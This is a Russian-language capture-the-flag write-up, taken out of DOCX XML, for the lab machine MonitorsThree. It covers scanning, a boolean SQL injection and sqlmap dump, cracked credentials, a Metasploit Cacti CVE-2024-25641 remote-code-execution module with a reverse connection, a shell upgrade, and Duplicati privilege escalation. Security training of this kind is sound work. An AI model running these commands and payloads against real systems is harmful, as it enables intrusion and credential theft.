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MonitorsThree</w:t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В данной лабараторной работе я буду действовать по следующему алгоритму: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Разведка;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Сканирование;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Эксплуатация уязвимостей;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Получение доступа;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Повышение привелегий;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1 Этап </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Разведка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Ip адрес уязвимой машины MonitorsThree – 10.10.11.30, мой IP адрес – 10.10.14.190 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>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2 Этап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</w:rPr>
        <w:t>Сканирование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поиска открытых портов я буду использовать инструмент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap.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Воспользовавшись командой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nmap -sS -sV --top-ports=10000 -T4 -v -oN MonitorsThreeNmapScan.nmap 10.10.11.30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, я получил следующие результаты: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5189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5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Текстовый вид результатов nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(MonitorsThreeNmapScan.nmap):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 Nmap 7.94SVN scan initiated Tue Dec  3 10:01:15 2024 as: /usr/lib/nmap/nmap --privileged -sS -sV --top-ports=10000 -T4 -v -oN MonitorsThreeNmapScan.nmap 10.10.11.30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Nmap scan report for 10.10.11.30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Host is up (0.10s latency).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Not shown: 8365 closed tcp ports (reset)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PORT     STATE    SERVICE VERSION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22/tcp   open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)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80/tcp   open     http    nginx 1.18.0 (Ubuntu)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8084/tcp filtered websnp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Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel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Read data files from: /usr/share/nmap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Service detection performed. Please report any incorrect results at https://nmap.org/submit/ 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 Nmap done at Tue Dec  3 10:01:38 2024 -- 1 IP address (1 host up) scanned in 23.32 seconds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Из результатов видно, что на уязвимой машине открыто два порта и один фильтруется, возможно, на нем запущен внутренний сервис. Порт 80 вселяет надежды, но, для начала, добавлю IP адрес в файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/etc/hosts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840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После добавления данных в /etc/hosts и перехода по </w:t>
      </w:r>
      <w:hyperlink r:id="rId4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ссылке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в браузере я попал на следующую страницу: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614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6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Анализ веб-сайта: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Файл robots.txt: не найден;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Исходный код главной страницы: подсказок или странных файлов, данных не содержит;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Поиск доменов: с помощью </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gobuster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найдено несколько доменов, но доступ к ним заблокирован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Поиск поддоменов: с помощью инструмента </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffuf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команды f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">fuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u http://monitorsthree.htb -H "Host: FUZZ.monitorsthree.htb" -fc 200,403 -t 200 -o MonitorsTreeFfufScan.txt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был найден поддомен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>cacti :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4226560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22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Добавлю его в файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/hosts </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и открою: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722370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72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br/>
        <w:t>Отсюда можно извлечь CMS – Cacti и версию – 1.2.26 .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Дополнительно:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="1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Существует два поля для пользовательского ввода:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId8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http://monitorsthree.htb/login.php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Форма для входа пользователя;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId9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http://monitorsthree.htb/forgot_password.php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Форма для восстановления пароля:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="2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Я решил попробовать ввести несколько полезных нагрузок.Первая же из них (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tester'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)выдала результат: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461010</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>229870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5646420" cy="3443605"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="6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44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Похоже, что сайт уязвим к SQL нъекции, используется MariaDB и MySql. После нескольких нагрузок мне удалось найти рабочую: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>admin' AND 1=1 -- -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. Отсюда следует, что это Boolean SQLi.  С помощью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Burp Suite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я перехватил запрос и записал его в файл. Воспользовавшись командой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sqlmap -r sqli.txt --dbms=mysql --level=3 --risk=3 –dbs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, я извлек имена таблиц.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1830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1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4225" cy="62865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Доступные базы данных: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information_schema;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monitorsthree_db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меня интересна вторая база данных. Найду все ее таблицы. Для этого я использовал команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap -r sqli.txt --dbms=mysql --level=3 --risk=3 -D monitorstree_db --dump-all –batch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Доступные таблицы из monitorsthree_db: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language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form_definition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primarytest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ab/>
        <w:t>Из базы данных я извлек данные админа(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admin:greencacti2001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>).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222222"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Этапы 3 и 4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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Эксплуатация уязвимостей и получение доступа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="222222"/>
          <w:spacing w:val="0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ab/>
        <w:t xml:space="preserve">Итак, у меня есть версия CMS, учетные данные администратора. C помощью этих данных я вошел в систему. Также я нашел уязвимость Cacti 1.2.26 –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CVE-2024-25641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 xml:space="preserve">. Эксплоит доступен в метасплоит. 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ab/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Порядок эксплуатации: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msfconsole;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search cacti;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use 3 or use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multi/http/cacti_package_import_rce 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show options;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set RHOSTS cacti.monitorsthree.htb;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set PASSWORD greencacti2001;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set LHOST &lt;attacker-ip&gt;;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set TARGET 1;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run;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Эксплоит может не запуститься с первого раза, в этом случае необходимо просто перезапустить. Лично у меня все заработало с 5 раза.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661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Данные пользователей должны где-то храниться, система уязвима к sql инъекции, значит, по логике, присутствует система управления базами данных. С целью проверить это я отправился в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/var/www/html/cacti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. Здесь я нашел директорию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include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и в ней файл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config.php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. Здесь я нашел учетные данные пользователя mysql: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cactiuser:cactiuser :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="star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576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 сканировании nmap порт 3306 помечался как закрытый, в тоже время доступна база данных.Значит MySql развернута во внутренней сети. Метерпретер не дал мне подключиться.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Мои дальнейшие действия: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shell;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python3 -c "import pty; pty.spawn('/bin/bash')";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mysql -u cactiuser -p;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ввёл пароль cactiuser;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SHOW databases;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USE cacti;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SHOW tables;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SELECT * FROM user_auth;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Здесь я нашел данные еще одного пользователя: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576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Приступаю к подбору пароля. Для этого использую инструмент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hashcat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. В базе данных hashcat этот хэш определен под номером 3200 и называется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bcrypt $2*$, Blowfish (Unix) .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С помощью команды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hashcat -a 0 -m 3200 hash.txt --wordlist /usr/share/wordlists/rockyou.txt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мне удалось найти пароль маркуса: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576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Итак, ещё одни валидные данные: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marcus:12345678910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Аутентифицируюсь как marcus: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8775" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="13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В директории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marcus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находился первый флаг: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5760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="14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Пользовательский флаг: 6a57b6627e40a55b8e18fecb927c1a0b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Этап 5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Повышение привелегий</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs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Приступаю к повышению привелегий (marcus → root):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Стандартные методы повышения привелегий не сработали. Тут я вспомнил про тот фильтрующийся порт. Кроме, 8084 порта появилось еще несколько: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5760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="largest"/>
            <wp:docPr id="15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Пожалуй, начнем с начала. Первый порт – 8200. Сделаю переадресацию портов. Для начала мне необходимы ssh ключи marcus, копирую их на свою машину. Используя команду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ssh -L 8200:127.0.0.1:8200 marcus@10.10.11.30 -i id_rsa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произвожу переадресацию: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370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Со своего браузера подключаюсь к 8200-ому порту:</w:t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-31750</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>78105</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6332220" cy="386143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6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Возможно, это какое-то приложение для проверки дубликатов среди паролей или аутентификации. Попробую найти в системе какие-нибудь данные об этом. С помощью команды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find / -type f -name "*duplicati*" 2&gt;/dev/null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я нашел следующее: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370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t xml:space="preserve">Далее для повышения привелегий я воспользовался </w:t>
      </w:r>
      <w:hyperlink r:id="rId23">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
            <w:i w:val="false"/>
            <w:caps w:val="false"/>
            <w:smallCaps w:val="false"/>
            <w:spacing w:val="0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>статьей</w:t>
        </w:r>
      </w:hyperlink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t xml:space="preserve"> . Файл НЕ был сохранен в домашней директории!!! После двух дней повышения привелегий у меня есть </w:t>
      </w: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28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>root флаг: 8b4c2b796030cc3ab42b4c5fc7d32bdf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center"/>
        <w:rPr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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Работа окончена!!!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(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2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monitorsthree.htb/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monitorsthree.htb/login.php" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://monitorsthree.htb/forgot_password.php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hyperlink" Target="https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee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333</TotalTime>
  <Application>LibreOffice/24.8.3.2$Linux_X86_64 LibreOffice_project/480$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>15</Pages>
  <Words>844</Words>
  <Characters>5244</Characters>
  <CharactersWithSpaces>6235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2024-12-03T10:02:29Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-12-08T12:35:49Z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